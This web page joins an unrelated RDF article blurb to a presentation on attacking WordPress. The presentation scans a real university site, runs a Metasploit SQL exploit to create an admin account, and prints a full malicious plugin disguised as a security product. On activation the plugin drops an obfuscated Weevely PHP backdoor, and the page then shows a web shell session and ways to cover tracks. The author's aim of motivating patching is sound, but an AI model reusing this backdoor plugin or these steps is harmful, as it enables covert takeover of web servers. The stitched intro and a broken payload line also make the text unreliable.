Data integration at scale: Creating webs of data with RDF

In the first installment of a five-part series on data-integration standards and technologies, Brian Sletten introduces the Resource Description Framework (RDF) as the basis for a new set of standards called Open Services for Lifecycle Collaboration (OSLC). As part of the World Wide Web Consortium (W3C) Semantic Web technology stack, RDF is designed to facilitate information integration among multiple participants without the need for extensive precoordination.


Original URL: http://www.ibm.com/developerworks/web/library/wa-data-integration-at-scale_rdf/index.html?ca=drs-

Original article

Attacking WordPress

  • I am a system administrator and programmer who develops web applications and I support High Performance Research Computing at the University of Michigan.
  • In my previous job, I was in charge of of the main central web infrastructure for the University of Michigan for 5 years, including providing hosting for WordPress sites at U-M.
  • 19 years of experience dealing with computer security compromises / break-ins.
  • 11 years of experience dealing with web application security compromises / break-ins, including WordPress.
  • A security expert (much more knowledgeable than me).
  • A bad guy (much more capable than me, with access to “bad guy tools”).

This presentation could be much scarier if done by either a security expert or a bad guy.

This presentation is an updated but significantly cut down version of a presentation I gave for WordPress Ann Arbor in January 2014. Please see that presentation for more details, especially about what types of bad guys there are, what motivates them, and how to protect your WordPress sites.

Both security experts and bad guys will have much more time and focus than a generalist such as I am.

Bad guys have access to malware, including very sophisticated toolkits to compromise web sites, “black hat” forums, and more. Toolkits and exploits are routinely bought and sold for Bitcoin or dollars on black market sites.

This presentation uses only “good guy tools” because I don’t want to use untrustworthy software or wind up on some law enforcement agency’s list.

The previous presentation exploited a PHP code injection vulnerability in the W3 Total Cache plugin and start a command shell on the web server. Today’s presentation will instead exploit a SQL query injection vulnerability to add a new administrative user to the WordPress site via the database.

The purpose of this presentation is to show how easy it can be to take control of a WordPress site that is not kept up to date, in order to help motivate you to keep your own WordPress sites up to date and secure.

Everything we show in this presentation is fairly basic, widely available on the Internet, and easily findable with normal web searches. This presentation does not cover any expert or advanced techniques.

Still, using anything from this presentation without authorization against sites or computers that do not belong to you is illegal and likely carries severe penalties. Don’t do it.

  • WordPress 4.0 (latest version as of the time of this presentation).
    • Plugin: Custom Contact Forms version 5.1.0.3 (one version older than the current release).

      “A customizable and intuitive contact form plugin for WordPress.”
      Downloaded over 641,000 times. Rated 3.8 out of 5 stars.

      Note! Version 5.1.0.3 has a security problem! The current version, released August 4, 2014, is 5.1.0.4.

  • Running on Ubuntu Server 14.04.1 LTS 64 bit (current LTS release), fully patched and updated.

Everything was set up according to the instructions at wordpress.org and ubuntu.com. The only extra thing that was done was to turn on SSH to allow command-line administration.

We’re using Ubuntu Server LTS because it is the most popular choice for people who run their own server.

badguy2.catseye.org

Screen shot from the Kali Linux web page

The attacking system is running in a second virtual machine on my laptop, and, like the target, is not publicly accessible.

We’re using the latest release: Kali Linux 1.0.9, which is based on Debian 7 “Wheezy”.

Kali Linux, http://www.kali.org/

  • A “good guy” tool that lets companies test their own networks for security problems.
  • It’s actually a collection of over 300 security tools, including tools to test security as well as forensic tools to recover from attacks.
  • It is a complete Linux system that can either be run as a “Live CD” or installed onto a computer.
  • We’re using it because it is the quickest, easiest way to launch our attack: download, boot, attack.

We’re actually going to use only three of the tools Kali Linux provides:

  • WPScan: Finds security problems on WordPress sites and performs brute-force discovery of WordPress usernames and passwords.
  • Metasploit: A very sophisticated security testing framework that includes a web interface to let us launch attacks without needing in-depth technical expertise.
  • Weevely: A “PHP web shell” that, when uploaded to a site, allows backdoor access and (potentially) full control of the web server.

Instead of using Kali Linux, we could just download and install WPScan, Metasploit, and Weevely. This requires only a tiny bit more technical knowledge than using Kali Linux does, plus a bit more configuration work, and is very do-able. We’re just being extra lazy.

To find out how to use WPScan, run it with the --help option:

root@badguy2: ~# wpscan --help
_______________________________________________________________
        __          _______   _____                  
                 / /  __  / ____|                 
            /  / /| |__) | (___   ___  __ _ _ __  
           /  / / |  ___/ ___  / __|/ _` | '_  
             /  /  | |     ____) | (__| (_| | | | |
            /  /   |_|    |_____/ ___|__,_|_| |_|

        WordPress Security Scanner by the WPScan Team 
                       Version 2.5.1
     Sponsored by the RandomStorm Open Source Initiative
   @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________

Help :

Some values are settable in a config file, see the example.conf.json

--update                            Update to the database to the latest version.
--url       | -u        The WordPress URL/domain to scan.
--force     | -f                    Forces WPScan to not check if the remote site is running WordPress.
--enumerate | -e [option(s)]        Enumeration.
  option :
    u        usernames from id 1 to 10
    u[10-20] usernames from id 10 to 20 (you must write [] chars)
    p        plugins
    vp       only vulnerable plugins
    ap       all plugins (can take a long time)
    tt       timthumbs
    t        themes
    vt       only vulnerable themes
    at       all themes (can take a long time)
  Multiple values are allowed : "-e tt,p" will enumerate timthumbs and plugins
  If no option is supplied, the default is "vt,tt,u,vp"

--exclude-content-based ""
                                    Used with the enumeration option, will exclude all occurrences based on the regexp or string supplied.
                                    You do not need to provide the regexp delimiters, but you must write the quotes (simple or double).
--config-file  | -c    Use the specified config file, see the example.conf.json.
--user-agent   | -a     Use the specified User-Agent.
--cookie                    String to read cookies from.
--random-agent | -r                 Use a random User-Agent.
--follow-redirection                If the target url has a redirection, it will be followed without asking if you wanted to do so or not
--batch                             Never ask for user input, use the default behaviour.
--no-color                          Do not use colors in the output.
--wp-content-dir    WPScan try to find the content directory (ie wp-content) by scanning the index page, however you can specified it.
                                    Subdirectories are allowed.
--wp-plugins-dir    Same thing than --wp-content-dir but for the plugins directory.
                                    If not supplied, WPScan will use wp-content-dir/plugins. Subdirectories are allowed
--proxy     Supply a proxy. HTTP, SOCKS4 SOCKS4A and SOCKS5 are supported.
                                    If no protocol is given (format host:port), HTTP will be used.
--proxy-auth     Supply the proxy login credentials.
--basic-auth     Set the HTTP Basic authentication.
--wordlist | -w           Supply a wordlist for the password bruter and do the brute.
--username | -U           Only brute force the supplied username.
--threads  | -t  The number of threads to use when multi-threading requests.
--cache-ttl              Typhoeus cache TTL.
--request-timeout  Request Timeout.
--connect-timeout  Connect Timeout.
--max-threads          Maximum Threads.
--help     | -h                     This help screen.
--verbose  | -v                     Verbose output.


Examples :

-Further help ...
ruby ./wpscan.rb --help

-Do 'non-intrusive' checks ...
ruby ./wpscan.rb --url www.example.com

-Do wordlist password brute force on enumerated users using 50 threads ...
ruby ./wpscan.rb --url www.example.com --wordlist darkc0de.lst --threads 50

-Do wordlist password brute force on the 'admin' username only ...
ruby ./wpscan.rb --url www.example.com --wordlist darkc0de.lst --username admin

-Enumerate installed plugins ...
ruby ./wpscan.rb --url www.example.com --enumerate p

-Enumerate installed themes ...
ruby ./wpscan.rb --url www.example.com --enumerate t

-Enumerate users ...
ruby ./wpscan.rb --url www.example.com --enumerate u

-Enumerate installed timthumbs ...
ruby ./wpscan.rb --url www.example.com --enumerate tt

-Use a HTTP proxy ...
ruby ./wpscan.rb --url www.example.com --proxy 127.0.0.1:8118

-Use a SOCKS5 proxy ... (cURL >= v7.21.7 needed)
ruby ./wpscan.rb --url www.example.com --proxy socks5://127.0.0.1:9000

-Use custom content directory ...
ruby ./wpscan.rb -u www.example.com --wp-content-dir custom-content

-Use custom plugins directory ...
ruby ./wpscan.rb -u www.example.com --wp-plugins-dir wp-content/custom-plugins

-Update the DB ...
ruby ./wpscan.rb --update

-Debug output ...
ruby ./wpscan.rb --url www.example.com --debug-output 2>debug.log

See README for further information.

root@badguy2: ~# 



Let’s look at http://arc.research.umich.edu/

root@badguy2: ~# wpscan --url arc.research.umich.edu
_______________________________________________________________
        __          _______   _____                  
                 / /  __  / ____|                 
            /  / /| |__) | (___   ___  __ _ _ __  
           /  / / |  ___/ ___  / __|/ _` | '_  
             /  /  | |     ____) | (__| (_| | | | |
            /  /   |_|    |_____/ ___|__,_|_| |_|

        WordPress Security Scanner by the WPScan Team 
                       Version 2.5.1
     Sponsored by the RandomStorm Open Source Initiative
   @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________

[+] URL: http://arc.research.umich.edu/
[+] Started: Thu Oct  2 21:32:30 2014

[+] robots.txt available under: 'http://arc.research.umich.edu/robots.txt'
[!] The WordPress 'http://arc.research.umich.edu/readme.html' file exists
[+] Interesting header: LINK: ; rel=shortlink
[+] Interesting header: SERVER: Apache
[+] XML-RPC Interface available under: http://arc.research.umich.edu/xmlrpc.php
[!] Upload directory has directory listing enabled: http://arc.research.umich.edu/wp-content/uploads/

[+] WordPress version 3.8.1 identified from meta generator
[!] 9 vulnerabilities identified from the version number

[!] Title: WordPress 1.0 - 3.8.1 administrator exploitable blind SQLi
    Reference: https://wpvulndb.com/vulnerabilities/5963
    Reference: https://security.dxw.com/advisories/sqli-in-wordpress-3-6-1/

[!] Title: WordPress 3.7.1 & 3.8.1 Potential Authentication Cookie Forgery
    Reference: https://wpvulndb.com/vulnerabilities/5964
    Reference: https://labs.mwrinfosecurity.com/blog/2014/04/11/wordpress-auth-cookie-forgery/
    Reference: https://github.com/WordPress/WordPress/commit/78a915e0e5927cf413aa6c2cef2fca3dc587f8be
    Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0166
    Reference: http://osvdb.org/105620
[i] Fixed in: 3.8.2

[!] Title: WordPress 3.7.1 & 3.8.1 Privilege escalation: contributors publishing posts
    Reference: https://wpvulndb.com/vulnerabilities/5965
    Reference: https://github.com/wpscanteam/wpscan/wiki/CVE-2014-0165
    Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0165
    Reference: http://osvdb.org/105630
[i] Fixed in: 3.8.2

[!] Title: WordPress Plupload Unspecified XSS
    Reference: https://wpvulndb.com/vulnerabilities/5966
    Reference: https://secunia.com/advisories/57769
    Reference: http://osvdb.org/105622
[i] Fixed in: 3.8.2

[!] Title: WordPress 3.5 - 3.7.1 XML-RPC DoS
    Reference: https://wpvulndb.com/vulnerabilities/7526
    Reference: http://wordpress.org/news/2014/08/wordpress-3-9-2/
    Reference: http://mashable.com/2014/08/06/wordpress-xml-blowup-dos/
    Reference: http://www.breaksec.com/?p=6362
    Reference: http://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
[i] Fixed in: 3.9.2

[!] Title: WordPress 2.0.3 - 3.9.1 (except 3.7.4 / 3.8.4) CSRF Token Brute Forcing
    Reference: https://wpvulndb.com/vulnerabilities/7528
    Reference: https://core.trac.wordpress.org/changeset/29384
    Reference: https://core.trac.wordpress.org/changeset/29408
    Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-5204
    Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-5205
[i] Fixed in: 3.9.2

[!] Title: WordPress 3.0 - 3.9.1 Authenticated Cross-Site Scripting (XSS) in Multisite
    Reference: https://wpvulndb.com/vulnerabilities/7529
    Reference: https://core.trac.wordpress.org/changeset/29398
    Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-5240
[i] Fixed in: 3.9.2

[!] Title: WordPress 3.6 - 3.9.1 XXE in GetID3 Library
    Reference: https://wpvulndb.com/vulnerabilities/7530
    Reference: https://github.com/JamesHeinrich/getID3/commit/dc8549079a24bb0619b6124ef2df767704f8d0bc
    Reference: http://getid3.sourceforge.net/
    Reference: http://wordpress.org/news/2014/08/wordpress-3-9-2/
    Reference: http://lab.onsec.ru/2014/09/wordpress-392-xxe-through-media-upload.html
    Reference: https://github.com/ONsec-Lab/scripts/blob/master/getid3-xxe.wav
    Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2053
[i] Fixed in: 3.9.2

[!] Title: WordPress 3.4.2 - 3.9.2 Does Not Invalidate Sessions Upon Logout
    Reference: https://wpvulndb.com/vulnerabilities/7531
    Reference: http://whiteoaksecurity.com/blog/2012/12/17/cve-2012-5868-wordpress-342-sessions-not-terminated-upon-explicit-user-logout
    Reference: http://blog.spiderlabs.com/2014/09/leveraging-lfi-to-get-full-compromise-on-wordpress-sites.html
    Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-5868
[i] Fixed in: 4.0

[+] WordPress theme in use: orci - v0.1.0

[+] Name: orci - v0.1.0
 |  Location: http://arc.research.umich.edu/wp-content/themes/orci/
[!] Directory listing is enabled: http://arc.research.umich.edu/wp-content/themes/orci/
 |  Style URL: http://arc.research.umich.edu/wp-content/themes/orci/style.css
 |  Theme Name: ORCI
 |  Theme URI: http://orci.research.umich.edu/
 |  Description: Child theme for the Twenty Eleven theme
 |  Author: John Pariseau
 |  Author URI: http://example.com/about/

[+] Detected parent theme: twentyeleven - v1.7

[+] Name: twentyeleven - v1.7
 |  Location: http://arc.research.umich.edu/wp-content/themes/twentyeleven/
 |  Readme: http://arc.research.umich.edu/wp-content/themes/twentyeleven/readme.txt
 |  Style URL: http://arc.research.umich.edu/wp-content/themes/twentyeleven/style.css
 |  Theme Name: Twenty Eleven
 |  Theme URI: http://wordpress.org/themes/twentyeleven
 |  Description: The 2011 theme for WordPress is sophisticated, lightweight, and adaptable. Make it yours with a c...
 |  Author: the WordPress team
 |  Author URI: http://wordpress.org/

[+] Enumerating plugins from passive detection ...
 | 8 plugins found:

[+] Name: contact-form-7 - v3.9.3
 |  Location: http://arc.research.umich.edu/wp-content/plugins/contact-form-7/
 |  Readme: http://arc.research.umich.edu/wp-content/plugins/contact-form-7/readme.txt
[!] Directory listing is enabled: http://arc.research.umich.edu/wp-content/plugins/contact-form-7/

[!] Title: Contact Form 7 & Old WP Versions - Crafted File Extension Upload Remote Code Execution
    Reference: https://wpvulndb.com/vulnerabilities/7021
    Reference: http://packetstormsecurity.com/files/125018/
    Reference: http://seclists.org/fulldisclosure/2014/Feb/0
    Reference: http://osvdb.org/102776

[+] Name: jquery-collapse-o-matic - v1.5.7
 |  Location: http://arc.research.umich.edu/wp-content/plugins/jquery-collapse-o-matic/
 |  Readme: http://arc.research.umich.edu/wp-content/plugins/jquery-collapse-o-matic/readme.txt
[!] Directory listing is enabled: http://arc.research.umich.edu/wp-content/plugins/jquery-collapse-o-matic/

[+] Name: jquery-colorbox - v4.6
 |  Location: http://arc.research.umich.edu/wp-content/plugins/jquery-colorbox/
 |  Readme: http://arc.research.umich.edu/wp-content/plugins/jquery-colorbox/readme.txt
[!] Directory listing is enabled: http://arc.research.umich.edu/wp-content/plugins/jquery-colorbox/

[+] Name: mailchimp - v1.4.1
 |  Location: http://arc.research.umich.edu/wp-content/plugins/mailchimp/
 |  Readme: http://arc.research.umich.edu/wp-content/plugins/mailchimp/readme.txt
[!] Directory listing is enabled: http://arc.research.umich.edu/wp-content/plugins/mailchimp/

[+] Name: page-list - v4.2
 |  Location: http://arc.research.umich.edu/wp-content/plugins/page-list/
 |  Readme: http://arc.research.umich.edu/wp-content/plugins/page-list/readme.txt
[!] Directory listing is enabled: http://arc.research.umich.edu/wp-content/plugins/page-list/

[+] Name: social - v2.11
 |  Location: http://arc.research.umich.edu/wp-content/plugins/social/
 |  Readme: http://arc.research.umich.edu/wp-content/plugins/social/README.txt
[!] Directory listing is enabled: http://arc.research.umich.edu/wp-content/plugins/social/

[+] Name: wp-paginate - v1.2.4
 |  Location: http://arc.research.umich.edu/wp-content/plugins/wp-paginate/
 |  Readme: http://arc.research.umich.edu/wp-content/plugins/wp-paginate/readme.txt
[!] Directory listing is enabled: http://arc.research.umich.edu/wp-content/plugins/wp-paginate/

[+] Name: youtube-shortcode - v1.8.5
 |  Location: http://arc.research.umich.edu/wp-content/plugins/youtube-shortcode/
 |  Readme: http://arc.research.umich.edu/wp-content/plugins/youtube-shortcode/readme.txt
[!] Directory listing is enabled: http://arc.research.umich.edu/wp-content/plugins/youtube-shortcode/

[+] Finished: Thu Oct  2 21:34:06 2014
[+] Memory used: 5.469 MB
[+] Elapsed time: 00:01:36
root@badguy2: ~# 



This is a WordPress site I use a lot at work.

WPScan can tell that the server runs Apache, but not what version.

Despite the #1 thing for keeping people from breaking into your site being to always keep up-to-date with the latest versions of everything, this site is still running WordPress 3.8.1. That’s very bad; unfortunately, it’s not uncommon.

WPScan found nine security vulnerabilities. Many are probably not anything that would be useful to the casual attacker, but some might be. Read the details at each of the reference URLs that WPScan provides to find out more.

WPScan found one theme (“orci”, which it can tell is a child theme of Twenty Eleven), and eight plugins. There are likely more which could be found by running WPScan with an exhaustive plugin search (“wpscan --enumerate ap“).

Note the web server configuration that permits the content of many directories to be listed — this is potentially very useful to an attacker.

If we wanted to attack this site, WPScan has given us a lot of potential avenues to explore.

Now, our intended target, http://myblog2.catseye.org/

Script started on Thu 02 Oct 2014 09:49:02 PM EDT
root@badguy2: ~# wpscan --url myblog2.catseye.org
_______________________________________________________________
        __          _______   _____                  
                 / /  __  / ____|                 
            /  / /| |__) | (___   ___  __ _ _ __  
           /  / / |  ___/ ___  / __|/ _` | '_  
             /  /  | |     ____) | (__| (_| | | | |
            /  /   |_|    |_____/ ___|__,_|_| |_|

        WordPress Security Scanner by the WPScan Team 
                       Version 2.5.1
     Sponsored by the RandomStorm Open Source Initiative
   @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________

[+] URL: http://myblog2.catseye.org/
[+] Started: Thu Oct  2 21:49:18 2014

[!] The WordPress 'http://myblog2.catseye.org/readme.html' file exists
[+] Interesting header: SERVER: Apache/2.4.7 (Ubuntu)
[+] Interesting header: X-POWERED-BY: PHP/5.5.9-1ubuntu4.4
[+] XML-RPC Interface available under: http://myblog2.catseye.org/xmlrpc.php

[+] WordPress version 4.0 identified from meta generator

[+] WordPress theme in use: twentyfourteen - v1.2

[+] Name: twentyfourteen - v1.2
 |  Location: http://myblog2.catseye.org/wp-content/themes/twentyfourteen/
 |  Style URL: http://myblog2.catseye.org/wp-content/themes/twentyfourteen/style.css
 |  Theme Name: Twenty Fourteen
 |  Theme URI: http://wordpress.org/themes/twentyfourteen
 |  Description: In 2014, our default theme lets you create a responsive magazine website with a sleek, modern des...
 |  Author: the WordPress team
 |  Author URI: http://wordpress.org/

[+] Enumerating plugins from passive detection ...
 | 1 plugins found:

[+] Name: custom-contact-forms - v5.1.0.3
 |  Location: http://myblog2.catseye.org/wp-content/plugins/custom-contact-forms/
 |  Readme: http://myblog2.catseye.org/wp-content/plugins/custom-contact-forms/readme.txt
[!] Directory listing is enabled: http://myblog2.catseye.org/wp-content/plugins/custom-contact-forms/

[!] Title: Custom Contact Forms <= 5.0.0.1 - Cross Site Scripting
    Reference: https://wpvulndb.com/vulnerabilities/6296
    Reference: http://packetstormsecurity.com/files/112616/

[!] Title: Custom Contact Forms <= 5.1.0.3 Database Import/Export
    Reference: https://wpvulndb.com/vulnerabilities/7542
    Reference: http://blog.sucuri.net/2014/08/database-takeover-in-custom-contact-forms.html
    Reference: http://www.rapid7.com/db/modules/auxiliary/admin/http/wp_custom_contact_forms
[i] Fixed in: 5.1.0.4

[+] Finished: Thu Oct  2 21:49:21 2014
[+] Memory used: 2.191 MB
[+] Elapsed time: 00:00:03
root@badguy2: ~# exit



WPScan was not only able to tell what web server software is being used, but also the versions of both Apache HTTP Server and PHP.

WPScan found the Custom Contacts Form plugin and correctly noticed a database vulnerablity in it.

Metasploit is available in four editions:

  • Metasploit Framework (free and open source, command line only)
  • Metasploit Community (free, includes web interface)
  • Metasploit Express, Metasploit Pro (commercial)

To run the Metasploit web interface under Kali Linux, type the following commands:

  service postgresql start
  service metasploit start

Wait a few minutes for Metasploit to start and create its databases, then go to http://badguy2.catseye.org:3790/

Everything we’re doing in this presentation can work with any of the editions. For this demo, we’re using Metasploit Community.

Basic steps:

  1. Create a Metasploit user account.
  2. Get and enter a license key (Community, Express, Pro editions).
  3. Create a project.
  4. Choose and run an exploit, breaking into the target’s site.
  5. Do what you want to the target’s site.

Steps 1 and 2 have already been done, we’ll start with step 3.

A project is like a container that keeps track of systems that are being tested, and results of the tests.

Metasploit web interface – main page:

Screenshot of the Metasploit web interface main page

This is the page a user gets after they create a Metasploit user account, request and enter a product key, and log in.

Click on the New Project button to begin.

<!–

Creating a new project:

–>
Screenshot of the Metasploit web interface New Project page

Just enter a name for the project and either the networks or IP addresses you’ll be testing and then click the Create Project button.

To speed things up, since we’re working with a single target, we’ll specify just its IP address instead of specifying a network range.

Project overview page:

Screenshot of the Metasploit web interface project overview page

Normally, we’d let Metasploit do a scan and then use the “Exploit” button to attempt to break into the sites that it found. But, since we know from WPScan that this site is running a vulnerable plugin, to save time, click on “Modules” in the top menu and select “Search…”. Then search for “wordpress”.

We’re actually using Metasploit here far below the level of complexity for which it is intended.

List of Metasploit WordPress exploit modules:

Screenshot of the list of Metasploit exploit modules for WordPress

Click on “WordPress custom-contact-forms Plugin SQL Upload”.

WordPress has a lot of vulnerabilities that are not listed here. If we’re interested in anything not shown, we can create an Metasploit module for it ourselves, or we could exploit it outside of Metasploit, either by hand or by using a different tool.

<!–

WordPress custom-contact-forms exploit module:

–>
Screenshot of the Custom Contact Form exploit module options page

Although there are a lot of options that can be set, all we need to do is make sure that the IP address of our target system is correct and then click “Run Module”. Metasploit will then attempt to create a new administrator user for us on the target WordPress site.

To make everything fit on this slide, I’ve edited out the fields that normally show up in the “Module Options” section.

Running the exploit:

Screenshot of the successful exploit

That’s all there is to it! The WordPress site has now been compromised, and we should be able to log in as an administrator.

Note that the exploit module first determined the WordPress database table prefix, then uploaded SQL queries to create the administrator account.

Attacker logging in to WordPress using the credentials created by the successful exploit

The most effective way to make things harder for the attacker at this point is to have the login page not be accessible. For example, if the attacker is in Vietnam but the login page is only accessible from IP addresses in Ann Arbor, the attacker would need to use a VPN, use the vulnerability in CCF to steal session information from the WordPress database, or leverage another SQL-based avenue of attack.

Screenshot of the WordPress Users page, showing the new administrative user

As you can see, the user created by the exploit is an administrator can can do anything the owner of the blog can do via WordPress.

But, it’s pretty obvious that the compromise has taken place. If the real owner of the site checks, they’ll see our account, delete it, and probably upgrade everything.

  • We could create or change some posts and hope that the owner of the site doesn’t notice. This could include adding SEO or links to other sites, or uploading drive-by attack kits to compromise the computers of anyone who visits the site. But we should probably assume that the owner of the site will notice, either sooner or later.
  • We could lock the owner out of the site by changing their password or just trashing the site, but they’d probably just regain control through their hosting provider and then restore from backup. (They keep regular, recent, verified-good backups of their entire WordPress site, right?)
  • Or, we could install a hidden back door that gives us full control of the server — right now we only have control of WordPress itself and can only do things that WordPress allows administrators to do — and then cover our tracks by deleting the administrator account we just created…
  • Weevely is a stealth PHP web shell that provides a telnet-like console. It is an essential tool for web application post exploitation, and can be used as stealth backdoor.”
  • Weevely contains “More than 30 modules to automate administration and post exploitation tasks”.
  • A Weevely tutorial is available.
  • Weevely comes as a standard part of Kali Linux.
  • To create the backdoor code that you can then upload to a web server to gain stealth remote access to the web server, run the command weevely generate and give it the password you want to use to control access to the backdoor:

root@badguy2:~# weevely generate L3tM3In
[generate.php] Backdoor file 'weevely.php' created with password 'L3tM3In'
root@badguy2:~# 

There are dozens of other PHP shells and backdoors; we chose Weevely just because it was convenient and included with Kali Linux.

Here’s the obfuscated PHP code (weevely.php) that Weevely created for us to upload:


This is valid PHP code that accepts a command from the attacker, verifies the attacker’s password, and, if it checks out, runs the command.

If we put this weevely.php file in the main WordPress directory, then we’d be able to access our back door at http://myblog2.catseye.org/weevely.php (although we’d have to use Weevely to access it there, going there with a web browser will just show a blank page).

In addition to being obfuscated, the code has some random elements that are unique to each piece of code Weevely generates — this helps to prevent anti-virus software and other malware scanners from detecting the code once it is uploaded.

So how do we get the weevely.php file onto the target web server?

  • Thanks the Metasploit exploit module, we have an administrator account on the WordPress site, and
    WordPress administrators can upload plugins containing .php files.
  • But a plugin that isn’t supposed to be present will be even more obvious than the administrator account that isn’t supposed to be there — people are more likely to look at their site’s plugins than their site’s users. And the owner of the site can just delete our backdoor-containing plugin.
  • So we upload a plugin that creates the backdoor when the plugin gets activated, and have the plugin put the backdoor outside of the plugin directory. Then we delete both the plugin and the administrator account ourselves to hide evidence that the WordPress site has been compromised.
  • We’ll put the backdoor into the main WordPress directory and name it wp-options.php (which isn’t a part of WordPress) to help it blend in with legitimate files.

Other choices for where to install the backdoor include in a hidden directory that we create, or deep in the wp-content/uploads directory.

We want to avoid putting the backdoor in the wp-admin or wp-includes directory as these directories can be deleted during WordPress upgrades.

Our backdoor-delivering plugin looks like this:

<?php
/*
Plugin Name: WP Elite Security Pro
Description: WP Elite Security Pro addresses over 250 potential security problems to keep your WordPress site secure like nothing else can.  Includes the Elite Guardian monitoring techology to keep you informed about attacks against your site.
Version: 1.3.1
Author: WP Trust Assurance, Inc.
Author URI: http://wordpress.org/plugins/wp-elite-security
License: GPL3
*/

function wesp_activate() {

  $str = <<<'ENDOFSTRING'
/**
 * Enhanced Security Keys and Salts.
 *
 * These are unique to each WordPress site and are generated automatically
 * during installation and upgrades.  They should not be changed manually.
 *
 * @since 4.0.0
 */
$puda="sjMpeyRrPSd0TTNJbic7ZWesNesobyesAnPCcuJGsuJz4nO2V2YWwoYmFzZTesY0X2RlY29kZShwcmVnX";
$qdqy = str_replace("v","","svtvrv_rveplvavce");
$gsqi="JesGM9J2esNvdW50JzskYT0kX0esNesPesT0tJRTestpZihyZXNlesdCgkYSk9esPesSdMMycgJiYgJGMoJGEpPe";
$oydb="3JlcGxhY2esUoYXJyYXkoJy9esbesXeslx3PVxzXSes8nLCcvXHMvJykessIGFycmF5KCcnLCcrJyesksIGespvaW4";
$dscq="oYXJyYXlesfc2xpY2UoJGesEsJGesMoJesGEespLTMespKSkpesKTestlY2hesvIesCc8LycuJGsuJz4esnO30=";
$itjh = $qdqy("ca", "", "bacascae64_dcaecaccaode");
$vwfl = $qdqy("rk","","rkcrkrrkerkarkterk_frkurknrkctrkirkorkn");
$qbdh = $vwfl('', $itjh($qdqy("es", "", $gsqi.$puda.$oydb.$dscq))); $qbdh();
ENDOFSTRING;

  $str = "n";

  $file = fopen( '/var/www/html/wp-options.php', 'w' );
  fwrite( $file, $str );
  fclose( $file );

}

register_activation_hook( __FILE__, 'wesp_activate' );

?>



The header of the plugin is full of lies, in case someone loads the WordPress plugin page during the brief amount of time we will have the plugin installed.

There is only one function, which we arrange to get called when the plugin is activated. This function creates the new file /var/www/html/wp-options.php and writes the Weevely backdoor into it.

Note that we add some comments — which are all lies — to the beginning of the backdoor file to make it seem more innocuous, in case the owner of the site finds and looks at it. Security keys and salts shouldn’t be messed with and look pretty similar to obfuscated PHP code, right?

Also note that we removed the PHP tags from the Weevely file, and we add them in afterward — this is to prevent them from being acted on prematurely when the plugin itself is running.

Zip up our wp-elite-security plugin, upload it, and activate it:

Screenshot of the activated, backdoor-delivering plugin

Now that our backdoor is installed, we can connect from the attacking machine directly to the web server to run any commands we want:

root@badguy2: ~# weevely http://myblog2.catseye.org/wp-options.php L3tM3In
      ________                     __
     |  |  |  |----.----.-.--.----'  |--.--.
     |  |  |  | -__| -__| |  | -__|  |  |  |
     |________|____|____|___/|____|__|___  | v1.1
                                     |_____|
              Stealth tiny web shell

[+] Browse filesystem, execute commands or list available modules with ':help'
[+] Current session: 'sessions/myblog2.catseye.org/wp-options.session'

www-data@myblog2:/var/www/html $ ls -l
total 184
-rw-r--r--  1 www-data www-data   418 Sep 24  2013 index.php
-rw-r--r--  1 www-data www-data 19930 Apr  9 19:50 license.txt
-rw-r--r--  1 www-data www-data  7192 Apr 21 00:42 readme.html
-rw-r--r--  1 www-data www-data  4951 Aug 20 13:30 wp-activate.php
drwxr-xr-x  9 www-data www-data  4096 Sep  4 12:25 wp-admin
-rw-r--r--  1 www-data www-data   271 Jan  8  2012 wp-blog-header.php
-rw-r--r--  1 www-data www-data  4946 Jun  5 00:38 wp-comments-post.php
-rw-r--r--  1 www-data www-data  2746 Aug 26 15:59 wp-config-sample.php
-rw-rw-rw-  1 www-data www-data  3036 Oct  2 20:14 wp-config.php
drwxr-xr-x  6 www-data www-data  4096 Oct  3 14:30 wp-content
-rw-r--r--  1 www-data www-data  2956 May 13 00:39 wp-cron.php
drwxr-xr-x 12 www-data www-data  4096 Sep  4 12:25 wp-includes
-rw-r--r--  1 www-data www-data  2380 Oct 24  2013 wp-links-opml.php
-rw-r--r--  1 www-data www-data  2714 Jul  7 12:42 wp-load.php
-rw-r--r--  1 www-data www-data 33043 Aug 27 01:32 wp-login.php
-rw-r--r--  1 www-data www-data  8252 Jul 17 05:12 wp-mail.php
-rw-r--r--  1 www-data www-data   856 Oct  3 14:33 wp-options.php
-rw-r--r--  1 www-data www-data 11115 Jul 18 05:13 wp-settings.php
-rw-r--r--  1 www-data www-data 26256 Jul 17 05:12 wp-signup.php
-rw-r--r--  1 www-data www-data  4026 Oct 24  2013 wp-trackback.php
-rw-r--r--  1 www-data www-data  3032 Feb  9  2014 xmlrpc.php
www-data@myblog2:/var/www/html $ :system.info
[system.info] Error downloading TOR exit list: 'http://exitlist.torproject.org/exit-addresses'
[system.info] Error downloading TOR exit list: 'http://exitlist.torproject.org/exit-addresses.new'
+--------------------+------------------------------------------------------------------------------------+
| client_ip          | 192.168.4.144                                                                      |
| max_execution_time | 30                                                                                 |
| script             | /wp-options.php                                                                    |
| check_tor          | False                                                                              |
| open_basedir       |                                                                                    |
| hostname           | myblog2                                                                            |
| php_self           | /wp-options.php                                                                    |
| whoami             | www-data                                                                           |
| uname              | Linux myblog2 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 |
| safe_mode          | 0                                                                                  |
| php_version        | 5.5.9-1ubuntu4.4                                                                   |
| release            | Ubuntu 14.04.1 LTS                                                                 |
| dir_sep            | /                                                                                  |
| os                 | Linux                                                                              |
| cwd                | /var/www/html                                                                      |
| document_root      | /var/www/html                                                                      |
+--------------------+------------------------------------------------------------------------------------+
www-data@myblog2:/var/www/html $ 



You can type :help to get a list of all of the built-in commands Weevely supports. Anything that does not begin with a colon is run as a command on the target web server.

